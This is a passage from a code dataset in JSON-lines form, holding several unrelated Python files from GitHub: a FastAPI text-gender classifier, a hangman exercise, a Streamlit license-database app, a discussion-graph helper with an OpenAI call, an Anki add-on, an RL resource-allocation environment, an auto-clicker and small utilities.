f_ratio = female_mentions / male_mentions\n\n    # Set an upper limit for the ratios to avoid JSON serialization issues\n    m_ratio = min(m_ratio, 1e6)\n    f_ratio = min(f_ratio, 1e6)\n\n    return {\n        \"male_to_female_ratio\": m_ratio,\n        \"female_to_male_ratio\": f_ratio,\n    }\n\n@app.post(\"/text_to_sentences\", response_model=TextAnalysisResult)\nasync def text_to_sentences_endpoint(text_to_analyze: TextToAnalyze):\n    # Split the input text into sentences using NLTK\n    sentences = sent_tokenize(text_to_analyze.text)\n\n    return {\"sentence_list\": sentences}\n\n\n# ----------------------------------------------------------------------------------------------------------------------------------------\n\nfrom transformers import pipeline\n\n# Load the zero-shot classification pipeline\n# classifier = pipeline(\"zero-shot-classification\", model='facebook/bart-large-mnli', tokenizer='facebook/bart-large-mnli')\nmodel_name = 'facebook/bart-large-mnli'\nmodel_dir = '/app/models'\nmodel, tokenizer = load_model_and_tokenizer(model_name, 
model_dir)\nclassifier = pipeline(\"zero-shot-classification\", model=model, tokenizer=tokenizer)\n\n\n\n# filter #1\nlabel_11 = \"human male subject\"\nlabel_12 = \"human female subject\"\nlabel_13 = \"neutral or inanimate subject\"\nlabel_list_1 = [label_11, label_12, label_13]\n\n# filter #2\nlabel_21 = \"a single male subject\"\nlabel_22 = \"a single female subject\"\nlabel_23 = \"multiple human subjects\"\nlabel_list_2 = [label_21, label_22, label_23]\n\ndef label_gender(sentence_list, label_list):\n    sentence_list_results = classifier(sentence_list, label_list)\n\n    result_list = []\n    for result in sentence_list_results:\n        result_list.append([result[\"sequence\"], result[\"labels\"][0]])\n\n    return pd.DataFrame(result_list, columns=['sentence', 'label'])\n\ndef get_final_label(label_x, label_y):\n    if (label_x == label_11) and (label_y == label_21):\n        return label_x\n    elif (label_x == label_12) and (label_y == label_22):\n        return label_x\n    elif(label_x == label_13):\n        return label_x\n    elif(label_y == label_23):\n        return label_y\n    else:\n        return 'error'\n\ndef get_result_df(sentence_list, label_list_1, label_list_2):\n    \n    # phase 1\n    result_df_1 = label_gender(sentence_list, label_list_1)\n    # phase 2\n    result_df_2 = label_gender(sentence_list, label_list_2)\n    result_df = pd.merge(result_df_1, result_df_2, on='sentence')\n    result_df['label'] = result_df.progress_apply(lambda row: get_final_label(row['label_x'], row['label_y']), axis=1)\n    del result_df['label_x']\n    del result_df['label_y']\n    \n    return result_df\n\n# result_list.append(get_result_df(sentence_list, label_list_1, label_list_2))\n\n@app.post(\"/classify_sentences\", response_model=List[dict])\nasync def classify_sentences_endpoint(sentences: Sentences):\n    try:\n        result_df = get_result_df(sentences.sentences, label_list_1, label_list_2)\n        result_list = result_df.to_dict(orient=\"records\")\n        return result_list\n    except Exception as e:\n        logging.error(f\"Error classifying sentences: {str(e)}\")\n        raise HTTPException(status_code=500, detail=\"An error occurred while classifying sentences\")\n","repo_name":"louispaulet/manalyzer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"40952862260","text":"from helper import inputCharacter\nimport re\nplayer_one_input = str(input('Player one, please, enter text: '))\nmine_field = \"\"\nstring_to_solve = \"\"\n\n# for c in player_one_input:\n#     if (c >= 'A' and c <= 'Z') or (c >= 'a' and c <= 'z'):\n#         mine_field+=\"*\"\n#         string_to_solve += c\n#     elif (c==\" \"):\n#         mine_field+=\" \"\n#         string_to_solve += c  \n    \n# Regex way is shorter:\nmine_field = re.sub('[A-Za-z0-9]', \"*\", player_one_input) \nstring_to_solve = player_one_input \n\nprint(player_one_input)\nprint(mine_field)\nprint(string_to_solve) # in case of regex it's redundant, was necessary for ascii compare though leaving in for test purposes\n\nsolved = False\nwhile(solved==False):\n    guess = inputCharacter(\"Input Your guess: \")\n    for c in string_to_solve:\n        if guess==c:\n            for index, char in enumerate(string_to_solve):\n                if char==c:\n                    mine_field = mine_field[:index] + c + mine_field[index+1:]\n            if mine_field==string_to_solve:\n                print (\"Congračuleišans\")\n                solved=True\n            else:\n                print(mine_field)\n\n\n\n# Write a program that recognizes a character in a text\n\n# The user (the first player) enters a text.\n\n# Only asterisks are printed in place of the letters. Assume there will be no digits, but spaces can occur\n\n# The user (i.e. the second player) enters a character. \n\n# If the letter is present, it is shown in the corresponding positions; all the other letters remain asterisks.\n\n# Potato field -> ********* *****\n\n# entering a -> *a****** *a***\n\n# In principle this is a good starting point for a hangman game.","repo_name":"veinisrate/python_course_rtu","sub_path":"5th-lecture-2nd-task.py","file_name":"5th-lecture-2nd-task.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"lv","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"10368323431","text":"import requests 
\nimport streamlit as st 
\nfrom streamlit_lottie import st_lottie 
\nimport mysql.connector\n\ndef display_list():\n    db_name=\"project\"\n    db=mysql.connector.connect(\n    host= \"localhost\",\n    user=\"root\",\n    password=\"\",\n    database=db_name\n    )\n    result3=st.button(\"FETCH\",key=1,help=None)\n    st.write(result3)\n    if result3: \n        sql=\"select aadhar, name, license_expiry_date from license order by license_expiry_date\"\n        cursor=db.cursor()\n        cursor.execute(sql)\n        \n        st.table(cursor)\n\n    \ndef min_dl():\n    db_name=\"project\"\n    db=mysql.connector.connect(\n    host= \"localhost\",\n    user=\"root\",\n    password=\"\",\n    database=db_name\n    )\n    result1=st.button(\"FETCH\",key=2,help=None)\n    st.write(result1)\n    if result1: \n        sql=\"select cov, min(dl_issue_date) from dl group by cov\"\n        cursor=db.cursor()\n        cursor.execute(sql)\n        \n        st.table(cursor)\n\ndef min_llr():\n    db_name=\"project\"\n    db=mysql.connector.connect(\n    host= \"localhost\",\n    user=\"root\",\n    password=\"\",\n    database=db_name\n    )\n    result1=st.button(\"FETCH\",key=3,help=None)\n    st.write(result1)\n    if result1: \n        sql=\"select cov, min(llr_issue_date) from llr group by cov\"\n        cursor=db.cursor()\n        cursor.execute(sql)\n        \n        st.table(cursor)\n\ndef earn ():\n    db_name=\"project\"\n    db=mysql.connector.connect(\n    host= \"localhost\",\n    user=\"root\",\n    password=\"\",\n    database=db_name\n    )\n    result1=st.button(\"COUNT\",key=5,help=None)\n    st.write(result1)\n    if result1: \n        sql=\"SELECT cov, sum(cost) as c FROM license GROUP BY cov HAVING SUM(cost) > 20;\"\n        cursor=db.cursor()\n        cursor.execute(sql)\n        \n        st.table(cursor)\n\ndef per1():\n    db_name=\"project\"\n    db=mysql.connector.connect(\n    host= \"localhost\",\n    user=\"root\",\n    password=\"\",\n    database=db_name\n    )\n    result1=st.button(\"FETCH\",key=4,help=None)\n    st.write(result1)\n    if result1: \n        sql=\"select count(*) from dl\"\n        cursor=db.cursor()\n        cursor.execute(sql)\n        a=cursor\n        st.table(a)\n        \n        #sql2=\"select count(*) from dl\"\n        #cursor.execute(sql2)\n        #b=cursor\n        #sql3=\"select count(*) from llr\"\n        #cursor.execute(sql2)\n        #c=cursor\n        \n        \n        #d=c+b\n        #e=(d/a)*100\n        #st.title(f\"Percentage={a}%\")\n       # st.title(f\"Percentage->{cursor}\")\n\n    \n    \n    \n\n\n    \n\n\nst.set_page_config(page_title=\"My Webpage\", page_icon = \":tada:\", layout = \"wide\")\n\ndef load_lottieur1(url):\n    r=requests.get(url)\n    if r.status_code!=200:\n        return None\n    return r.json()\n\n\n\nlottie_coding=load_lottieur1(\"https://assets8.lottiefiles.com/packages/lf20_rhgcitkd.json\")\nlottie_coding2=load_lottieur1(\"https://assets4.lottiefiles.com/packages/lf20_mb4fxabx.json\")\nwith st.container ():\n    st.subheader(\"Hi I am Parth :wave:\")\n    st.title(\"A PES UNIV student\")\n    st.write(\"[Learn More>](https://pes.edu/)\")\n\n\n    \nwith st.container():\n    st.write (\"---\")\n    left_column , right_column = st.columns(2)\n    with left_column:\n        st.write(\"RANDOM FACTS...\")\n        st.subheader (\"First 
learning license ever\")\n # result=st.button(\"FIND\",key=1)\n # st.write(result)\n min_llr()\n st.subheader (\"First driving liscene ever\")\n # result2=st.button(\"FIND\",key=2)\n # st.write(result2)\n min_dl()\n st.subheader(\"No of Citizens who have both driving license and learning license \")\n per1()\n st.subheader(\"Which COV department earns the most and how much?\")\n earn()\n\n with right_column:\n st_lottie(lottie_coding2, height=300, key=\"rto\")\n \n\nwith st.container():\n left_column , right_column = st.columns(2)\n with left_column:\n st.write(\"---\")\n st.subheader(\"Upcoming Expiry Dates for License\")\n display_list()\n with right_column:\n st_lottie(lottie_coding, height=300, key=\"rt02\")\n\n \n\n \n\n\n\n\n \n\n","repo_name":"prth1234/DBMS","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28576024215","text":"import json\nfrom datetime import datetime\nimport openai\nimport glob\nimport os\n\n# creates a new node in the graph with parent id and content\ndef create(adj, p_id, content, user):\n now = datetime.now().strftime(\"%Y/%m/%d %H:%M:%S\")\n id = len(adj)\n if str(id) not in adj:\n adj[str(id)] = [[], content, p_id, user, now]\n else:\n while str(id) in adj:\n id += 1\n adj[str(id)] = [[], content, p_id, user, now]\n if p_id in adj:\n adj[p_id][0].append(str(id))\n return(adj)\n\n# updates a node in the graph by id and new content\ndef update(adj, id, new_content):\n adj[id][1] = new_content\n return(adj)\n\n# deletes a node in the graph by id\ndef delete(adj, id):\n # if root\n if id == \"0\":\n pass\n else:\n # if leaf\n if adj[id][0] == []:\n adj.pop(id)\n for key, value in adj.items():\n if id in adj[key][0]:\n adj[key][0].remove(id)\n else:\n adj[id][1] = \"removed\"\n return(adj)\n\n# depth first search\ndef dfs(depth, adj, id, check, grt):\n\n if id not in check:\n content = adj[id][1]\n p_id = adj[id][2]\n user = adj[id][3]\n time = \"null\" # adj[id][4]\n grt.append([depth, id, content, p_id, user, time])\n depth += 1\n check.add(id)\n neighbors = adj[id][0]\n for n in neighbors:\n dfs(depth, adj, n, check, grt)\n \n return(grt)\n# what it does is it takes the graph and returns a list of lists\n# each list is a node in the graph\n\n# searches root nodes in the forest... 
content contains x\ndef search(adj, x):\n    for key, value in adj.items():\n        if x in value[1]:\n            return key, value\n\n# defines which graph to use\ndef use(file_name):\n    f1 = open(\"./model/graphs/{}\".format(file_name+\".json\"), \"r\")\n    f2 = f1.read(-1) # str, entire file\n    adj = json.loads(f2) # str (json) to dict\n    f1.close() # save memory\n    return(adj, file_name)\n\n# saves the graph to a file\ndef save(adj, file_name):\n    f2 = json.dumps(adj) # dict to json?\n    f1 = open(\"./model/graphs/{}.json\".format(file_name), \"w\")\n    f1.write(f2)\n    f1.close()\n\n# returns the stats of the graph\ndef stats(adj, grt):\n    d = set()\n    for node in grt:\n        d.add(node[0])\n    depth = max(d)\n    b = set()\n    for key, value in adj.items():\n        b.add(len(adj[key][0]))\n    breadth = max(b)\n    leafs = 0\n    for key, value in adj.items():\n        if adj[key][0] == []:\n            leafs += 1\n    stats = {}\n    stats[\"depth\"] = depth\n    stats[\"breadth\"] = breadth\n    stats[\"leafs\"] = leafs\n    return(stats)\n\n# returns the users\ndef users():\n    f1 = open(\"./model/misc/users.json\", \"r\")\n    f2 = f1.read(-1) # str, entire file\n    users = json.loads(f2) # str (json) to dict\n    f1.close() # save memory\n    return(users)\n\n# saves the users to a json file\ndef users_save(users):\n    f2 = json.dumps(users) # dict to json?\n    f1 = open(\"./model/users.json\", \"w\")\n    f1.write(f2)\n    f1.close()\n\n# openai API call to generate a response\ndef ai(post):\n\n    conversation = [\n        {\"role\": \"system\", \"content\": \"Ignore previous instructions. Role play as someone who always give a counterargument no matter what. Your responses are short, to the point, simple, polite, and reasonable.\"},\n    ]\n\n    conversation.append({\"role\": \"user\", \"content\": post})\n\n    # read the key from the environment; a real secret must never be hard-coded in source\n    openai.api_key = os.getenv(\"OPENAI_API_KEY\")\n\n    # Generate a chatbot response\n    completion = openai.ChatCompletion.create(\n        model=\"gpt-3.5-turbo\",\n        messages=conversation\n    )\n\n    # Add the chatbot response to the conversation\n    chatbot_response = completion.choices[0].message.content.strip()\n\n    return(str(chatbot_response))\n\n# deletes all the graphs that have no root\ndef cleanup():\n    forest = {}\n    for x in glob.glob(\"./model/graphs/*\"):\n        f1 = open(\"{}\".format(x), \"r\")\n        f2 = f1.read(-1) # str, entire file\n        adj = json.loads(f2) # str (json) to dict\n        f1.close() # save memory\n        if not \"0\" in adj.keys():\n            os.system(\"rm {}\".format(x))\n        else:\n            if adj[\"0\"][1] == \"\":\n                os.system(\"rm {}\".format(x))\n\n# deletes a thread from the forest\ndef delete_thread(file_name):\n    os.system(\"rm {}\".format(file_name))\n    f1 = open(\"./model/forest.json\", \"r\")\n    f2 = f1.read(-1) # str, entire file\n    adj = json.loads(f2) # str (json) to dict\n\n# creates a forest of all the graphs\ndef populate():\n    forest = {}\n    for x in glob.glob(\"./model/graphs/*\"):\n        f1 = open(\"{}\".format(x), \"r\")\n        f2 = f1.read(-1) # str, entire file\n        adj = json.loads(f2) # str (json) to dict\n        f1.close() # save memory\n        forest.update({x[15:27]: adj[\"0\"][1]})\n    f2 = json.dumps(forest) # dict to json?\n    f1 = open(\"./model/misc/forest.json\", \"w\")\n    f1.write(f2)\n    f1.close()","repo_name":"dw31382/cogitatio","sub_path":"extra.py","file_name":"extra.py","file_ext":"py","file_size_in_byte":4923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"73551370347","text":"from functools import cmp_to_key\n\ndef is_ordered(A, B):\n    for a, b in zip(A, B):\n        if type(a) is int and type(b) is int:\n            
if a != b:\n return b - a\n else:\n x = is_ordered([a] if type(a) is int else a, [b] if type(b) is int else b)\n\n if x < 0:\n return -1\n elif x > 0:\n return 1\n\n return len(B) - len(A)\n\n\ntotal = 0\n\nfor i, pair in enumerate(open('input.txt').read().split('\\n\\n')):\n a, b = map(eval, pair.split('\\n'))\n total += (i + 1) * (is_ordered(a, b) >= 0)\n\nprint(total)\n\ndef is_ordered(A, B):\n for a, b in zip(A, B):\n if type(a) is int and type(b) is int:\n if a != b:\n return b - a\n else:\n x = is_ordered([a] if type(a) is int else a, [b] if type(b) is int else b)\n\n if x < 0:\n return -1\n elif x > 0:\n return 1\n\n return len(B) - len(A)\n\n\npackets = list(map(eval, open('input.txt').read().split())) + [[[2]]] + [[[6]]]\npackets = sorted(packets, key=cmp_to_key(is_ordered), reverse=True)\n\nd1 = packets.index([[2]]) + 1\nd2 = packets.index([[6]]) + 1\nprint(d1 * d2)","repo_name":"tkruer/advent-of-code-2022","sub_path":"day_thirteen/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17133388293","text":"#!/bin/python3\nimport subprocess\nimport numpy as np\nimport itertools\nimport time\n\nN = 16\n\nmnt_path = '../mnt'\nmnt_gdfs_cmd = ['gdfs', 'default', mnt_path]\nmnt_gdocaml_cmd = ['google-drive-ocamlfuse', mnt_path]\nmnt_drivefs_cmd = ['../drivefs.py', mnt_path]\nunmount_cmd = ['fusermount', '-u', mnt_path]\nworkloads = ['./tree.sh', './fs-ops.sh', './reads.sh', './writes.sh']\n\ndef scrape(output):\n return [float(x) for x in output.split()]\n\ndef run_command(cmd, cwd=\".\"):\n result = subprocess.run(cmd, stderr=subprocess.PIPE, cwd=cwd)\n return result.stderr.decode()\n\ndef list_to_str(arr):\n return ' '.join(arr)\n\nif __name__ == '__main__':\n data = []\n mnt_cmds = [mnt_gdfs_cmd, mnt_gdocaml_cmd, mnt_drivefs_cmd]\n for mnt_cmd in mnt_cmds:\n run_command(mnt_cmd)\n # give the FS time to mount\n time.sleep(15)\n results = []\n for workload in workloads:\n workload_cmd = '{} {} {} > /dev/null 2> /dev/null'.format(workload, mnt_path, str(N))\n workload_cmd = ['/usr/bin/time', '-f', '%e %U %S', 'bash', '-c', workload_cmd]\n output = run_command(workload_cmd)\n times = scrape(output)\n print(times)\n results.append(times)\n run_command(unmount_cmd)\n data.append(results)\n print(data)\n\n","repo_name":"PabstMatthew/drivefs","sub_path":"workloads/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"24512588229","text":"import os\nimport hashlib\nimport requests\n\n\ndef get_md5(content: bytes):\n \"\"\"获取md5值\"\"\"\n md5_obj = hashlib.md5()\n md5_obj.update(content)\n hash = md5_obj.hexdigest()\n return hash\n\n\ndef get_checkcode(*, save=True, filepath='../image/images_source', filename=None):\n url = 'http://jxgl.hdu.edu.cn/CheckCode.aspx'\n response = requests.get(url)\n content = response.content\n if save:\n if filename is None:\n filename = get_md5(content)\n if not os.path.exists(filepath):\n os.mkdir(filepath)\n with open('/'.join((filepath, filename)) + '.gif', 'wb') as fp:\n fp.write(content)\n return content\n","repo_name":"yinjinya/hdu-ClassQuery","sub_path":"Crawler/get_checkcode.py","file_name":"get_checkcode.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40981615670","text":"from anki import 
hooks\nfrom anki.sound import play\nfrom aqt import mw # main window object\nimport anki.cards # import Card\nfrom aqt.qt import *\nfrom aqt.reviewer import Reviewer\nfrom aqt.utils import showInfo\nfrom math import floor\nfrom os import path\nfrom random import choice\nfrom aqt import gui_hooks\n\n\n# parse config.json\nconfig = mw.addonManager.getConfig(__name__)\n\n# retrieve sound effect\naddon_path = path.dirname(__file__)\nuser_files = path.join(addon_path, \"user_files\")\nslow_down_sound = path.join(user_files, \"slow_down.mp3\")\n\n# whether the add-on should take effect\nACTIVE = config['ACTIVE']\n\n# whether the sound effect should be muted\nMUTED = config['MUTED']\n\n# the minimum number of seconds the user should look at a card with each ease\nMIN_AGAIN_SECONDS = config['MIN_AGAIN_SECONDS']\nMIN_HARD_SECONDS = config['MIN_HARD_SECONDS']\nMIN_GOOD_SECONDS = config['MIN_GOOD_SECONDS']\nMIN_EASY_SECONDS = config['MIN_EASY_SECONDS']\n\n# the potential messages to be shown when the user continues too quickly\nSLOW_DOWN_MESSAGES = config['SLOW_DOWN_MESSAGES']\n\ndef show_pop_up(seconds_taken):\n    \"\"\"\n    Displays a pop-up window on screen detailing the number of seconds taken, along with a brief message\n\n    :param seconds_taken: How many seconds (rounded down) the user stayed on the card\n    \"\"\"\n    if seconds_taken < 2:\n        showInfo( \"You only spent a second on this card! %s\" % choice(SLOW_DOWN_MESSAGES) )\n    else:\n        showInfo( \"You only spent %d seconds on this card. %s\" % ( seconds_taken, choice(SLOW_DOWN_MESSAGES) ) )\n\ndef play_sound():\n    \"\"\" Plays a short sound effect if the add-on is not muted \"\"\"\n    if not MUTED:\n        play(slow_down_sound)\n\ndef judge_pace_new(card, ease, early): # 2.1.20+\n    judge_pace(card, ease)\n\ndef judge_pace_old(self, ease): # 2.1.19-\n    judge_pace(self.card, ease)\n\ndef judge_pace_new2(card, ease, early): # 2.1.35+\n    judge_pace_2(card, ease)\n\ndef judge_pace_2(card, ease): # 2.1.35+\n    if mw.col.sched.answerButtons(mw.reviewer.card) == 1 and ease.timeTaken() < MIN_AGAIN_SECONDS * 1000 :\n        play_sound()\n        show_pop_up(floor(ease.timeTaken() / 1000) )\n    if mw.col.sched.answerButtons(mw.reviewer.card) == 2 and ease.timeTaken() < MIN_HARD_SECONDS * 1000 :\n        play_sound()\n        show_pop_up(floor(ease.timeTaken() / 1000) )\n    if mw.col.sched.answerButtons(mw.reviewer.card) == 3 and ease.timeTaken() < MIN_GOOD_SECONDS * 1000 :\n        play_sound()\n        show_pop_up(floor(ease.timeTaken() / 1000) )\n    if mw.col.sched.answerButtons(mw.reviewer.card) == 4 and ease.timeTaken() < MIN_EASY_SECONDS * 1000 :\n        play_sound()\n        show_pop_up(floor(ease.timeTaken() / 1000) ) \n\ndef judge_pace(card, ease):\n    \"\"\"\n    Determines if the user answered the card too quickly, and alerts the user if so\n\n    :param card: The card the user has just answered\n    :param ease: The difficulty-corresponding button the user selected (1 = incorrect)\n    \"\"\"\n    if (ease == 1 and card.timeTaken() < MIN_AGAIN_SECONDS * 1000\n            or ease == 2 and card.timeTaken() < MIN_HARD_SECONDS * 1000\n            or ease == 3 and card.timeTaken() < MIN_GOOD_SECONDS * 1000\n            or ease == 4 and card.timeTaken() < MIN_EASY_SECONDS * 1000):\n        play_sound()\n        show_pop_up( floor(card.timeTaken() / 1000) )\n\n# attach hook depending on version compatibility; each older API is tried only\n# if the newer one is missing (a flat second `except AttributeError` on the same\n# try would be unreachable dead code)\ntry:\n    gui_hooks.reviewer_did_answer_card.append(judge_pace_new2) #2.1.35+\nexcept AttributeError:\n    try:\n        hooks.schedv2_did_answer_review_card.append(judge_pace_new) #2.1.20+\n    except AttributeError:\n        Reviewer._answerCard = hooks.wrap(Reviewer._answerCard, judge_pace_old, \"before\") 
#2.1.19-\n","repo_name":"jhd-dev/anki-speed-limit","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3633,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"37463507075","text":"import gym\nfrom gym import spaces\nfrom gym.utils import seeding\nimport numpy as np\nimport matplotlib.pyplot as matplt\nfrom parameters import use_other_utility_function\n\nclass ResourceEnv(gym.Env):\n\n def __init__(self, alpha, weight, total_resource=100, num_res=3, num_user=5, min_reward=100, max_time=20, rho=1.0, aug_penalty=[], test_env=False):\n self.Rmax = total_resource # total number of resource\n self.UENum = num_user # number of slices\n self.num_res = num_res\n self.maxTime = max_time\n self.min_Reward = min_reward * np.ones(self.UENum)\n self.aug_penalty = self.Rmax * np.ones(self.num_res)\n self.aug_penalty = aug_penalty\n self.rho = rho\n self.alpha = alpha\n self.weight = weight\n self.test_env = test_env\n\n self.action_min = np.zeros(self.UENum*self.num_res)\n self.action_max = np.ones(self.UENum*self.num_res)\n self.state_min = np.zeros(self.UENum+self.num_res)\n self.state_max = np.ones(self.UENum+self.num_res)\n\n self.action_space = spaces.Box(self.action_min, self.action_max, dtype=np.float32)\n self.observation_space = spaces.Box(self.state_min, self.state_max, dtype=np.float32)\n\n self.action_dim = self.action_space.shape[0]\n self.observe_dim = self.observation_space.shape[0]\n\n # these variables need reset for env\n self.iter = 0\n self.accu_reward = np.zeros(self.UENum)\n self.remain_reward = self.min_Reward\n\n self.reset()\n\n\n def step(self, in_action):\n\n action = np.clip(in_action, self.action_min, self.action_max)\n\n assert self.action_space.contains(action), \"%r (%s) invalid\" % (action, type(action))\n\n action = self.Rmax * np.reshape(action, [self.num_res, self.UENum]) # reshape into number of resource * number of users\n\n penalty = 0.5 * self.rho * np.sum(np.abs(np.sum(action, axis=1) - self.aug_penalty)) # should be square but too small when gap is 0.1, not good for convergence\n\n real_reward = self.calculate_reward(action)\n\n weight_reward = np.multiply(real_reward, self.weight)\n\n self.accu_reward = np.add(self.accu_reward, real_reward)\n\n #constraint = np.clip((self.remain_reward / (self.maxTime - self.iter)) - real_reward, 0, None) # avg_reward_until_now\n\n #constraint = (self.remain_reward / (self.maxTime - self.iter)) - real_reward # avg_reward_until_now\n\n constraint = [self.tanh_func(real_reward[i], self.min_Reward[i] / self.maxTime) for i in range(self.UENum)] # avg_reward_until_now\n\n self.remain_reward = np.clip(np.subtract(self.min_Reward, self.accu_reward), 0, None)\n\n final_state = np.concatenate([self.remain_reward, self.aug_penalty])\n\n # use maxTime as the weight of constraint, since its calculation is some kind of divided by maxTime\n final_reward = np.sum(weight_reward) + self.maxTime * np.sum(constraint) - penalty # increase the weight of penalty when the episode is almost done\n\n self.iter += 1\n\n done = False\n\n if self.iter >= self.maxTime:\n done = True\n self.reset()\n\n return final_state, final_reward, done, np.sum(weight_reward)\n\n def calculate_reward(self, action):\n\n reward = np.zeros([self.num_res, self.UENum], dtype=np.float32)\n\n for i in range(self.num_res):\n for j in range(self.UENum):\n reward[i][j] = (action[i][j] ** self.alpha[i][j]) / self.alpha[i][j]\n if use_other_utility_function:\n reward[i][j] = 
self.Rmax/(self.Rmax * np.exp(- self.alpha[i][j] * action[i][j]) + 1)\n\n        return np.mean(reward, axis=0) # np.min(reward, axis=0)\n\n    def tanh_func(self, x, a):\n\n        y = np.clip(1/(np.exp(-2*(x-a))) - 1, -1, 0)\n\n        return y\n\n    def reset(self):\n\n        self.iter = 0\n\n        self.accu_reward = np.zeros(self.UENum)\n\n        self.remain_reward = self.min_Reward\n\n        if not self.test_env: # if this is not a test env, randomize the penalty for training\n            self.aug_penalty = np.random.uniform(0, self.Rmax, self.num_res)\n\n        initial_state = np.concatenate([self.remain_reward, self.aug_penalty])\n\n        return initial_state\n\n    def render(self):\n        pass\n\n    def close(self):\n        pass\n","repo_name":"int-unl/DeepSlicing","sub_path":"env_mra.py","file_name":"env_mra.py","file_ext":"py","file_size_in_byte":4311,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"37"}
+{"seq_id":"18590558539","text":"import numpy as np\r\nfrom functools import reduce\r\n\r\nclass Tfidf:\r\n    @property\r\n    def word_dictionary(self):\r\n        return self.__word_dictionary\r\n\r\n    def __create_idf(self, corpus):\r\n        n_words = np.zeros_like(self.__word_dictionary, dtype=int)\r\n        for row in corpus:\r\n            _, indexes, _ = np.intersect1d(self.word_dictionary, row, return_indices=True)\r\n            n_words[indexes] += 1\r\n\r\n        return np.log(len(corpus) / (n_words + 1))\r\n\r\n    def fit_transform(self, X):\r\n        '''\r\n        Parameters\r\n        ----------\r\n        X : shape (n_corpus, text_length)\r\n            Training corpus\r\n\r\n        Returns\r\n        -------\r\n        Tf-idf matrix : shape (n_corpus, dictionary_length)\r\n            Tf-idf-weighted document-term matrix\r\n        '''\r\n        self.__word_dictionary = reduce(np.union1d, X)\r\n        self.__idf = self.__create_idf(X)\r\n        \r\n        return self.transform(X)\r\n\r\n    def transform(self, X):\r\n        '''\r\n        Parameters\r\n        ----------\r\n        X : shape (n_corpus, text_length)\r\n            Predicting corpus\r\n\r\n        Returns\r\n        -------\r\n        Tf-idf matrix : shape (n_corpus, dictionary_length)\r\n            Tf-idf-weighted document-term matrix\r\n        '''  \r\n        tf = np.zeros((len(X), len(self.__word_dictionary)))\r\n        for i in range(len(X)):\r\n            for j in range(len(self.__word_dictionary)):\r\n                tf[i, j] = X[i].count(self.__word_dictionary[j])\r\n\r\n        return tf * self.__idf","repo_name":"zhaoyichanghong/machine_learing_algo_python","sub_path":"text_preprocess.py","file_name":"text_preprocess.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"37"}
+{"seq_id":"15111869437","text":"import time\nimport threading\nfrom pynput.mouse import Controller, Button\nfrom pynput.keyboard import Listener, KeyCode\n\ntoggle_key = KeyCode(char='e')\nclicking = False\nmouse = Controller()\n\n\ndef clicker():\n    while True:\n        if clicking:\n            mouse.click(Button.left, 1)\n        time.sleep(0.1)\n\n\ndef toggle_event(key): # tracks whether clicking is active and lets the user toggle the state\n    if key == toggle_key:\n        global clicking\n        clicking = not clicking\n\n\ndef main():\n    clicking_thread = threading.Thread(target=clicker) # worker thread that performs the clicks\n    clicking_thread.start()\n\n    with Listener(on_press=toggle_event) as listener: # listener thread that watches the keyboard for the toggle key\n        listener.join() \n\n\nif __name__ == '__main__':\n    main()","repo_name":"RavenDenster/clicker-pyToday","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
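The auto-clicker record above flips a bare module-level boolean from the listener thread while the worker busy-polls it. A thread-safe variant of the same idea uses threading.Event, which lets the worker block while paused instead of spinning. The sketch below is one possible rewrite, not the original author's code; it carries over the same pynput setup, the 'e' toggle key, and the 0.1 s click interval as assumptions taken from that snippet.

import threading
import time

from pynput.mouse import Controller, Button
from pynput.keyboard import Listener, KeyCode

toggle_key = KeyCode(char='e')  # same toggle key as the snippet above (arbitrary choice)
clicking = threading.Event()    # set = clicking enabled, cleared = paused
mouse = Controller()


def clicker():
    while True:
        clicking.wait()              # blocks while paused instead of busy-polling
        mouse.click(Button.left, 1)
        time.sleep(0.1)              # same click interval as the original sketch


def toggle_event(key):
    if key == toggle_key:
        # Event gives a thread-safe flag; no `global` mutation is needed
        if clicking.is_set():
            clicking.clear()
        else:
            clicking.set()


def main():
    threading.Thread(target=clicker, daemon=True).start()  # daemon: exits with the listener
    with Listener(on_press=toggle_event) as listener:
        listener.join()


if __name__ == '__main__':
    main()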
+{"seq_id":"37482966701","text":"import numpy as np\nfrom typing import Callable, NamedTuple, Tuple, Union\nfrom typing import NamedTuple, List, Optional, Any\nfrom spacy.tokens import Doc\nfrom spacy.tokens import Token\n\nfrom src.logconf import get_logger\n\n# logging\nlogger = get_logger(__name__)\nlogger.info(\"Logging from src/axidoc/doctypes.py module.\")\n\nArrRepresentations = Tuple[Union[np.ndarray, None], Union[np.ndarray, None], Union[np.ndarray, None]]\n#SimilarityScores = Tuple[Union[np.ndarray, None], Union[np.ndarray, None], Union[np.ndarray, None]]\nSimilarityScores = Tuple[Union[float, None], Union[float, None], Union[float, None]]\n\n\nclass Window(NamedTuple):\n \"\"\"\n Contains information about a specific window in a document.\n\n Attributes:\n tokens: List of tokens in the window.\n start_pos: Start position of the window in the document.\n end_pos: End position of the window in the document.\n \"\"\"\n\n content: Doc\n start_pos: int\n end_pos: int\n\n\nclass WindowRepresentation(NamedTuple):\n \"\"\"\n Contains a numerical representation about a specific window in a document.\n\n Attributes:\n arr: Numerical representation of the window.\n pos: Start and end 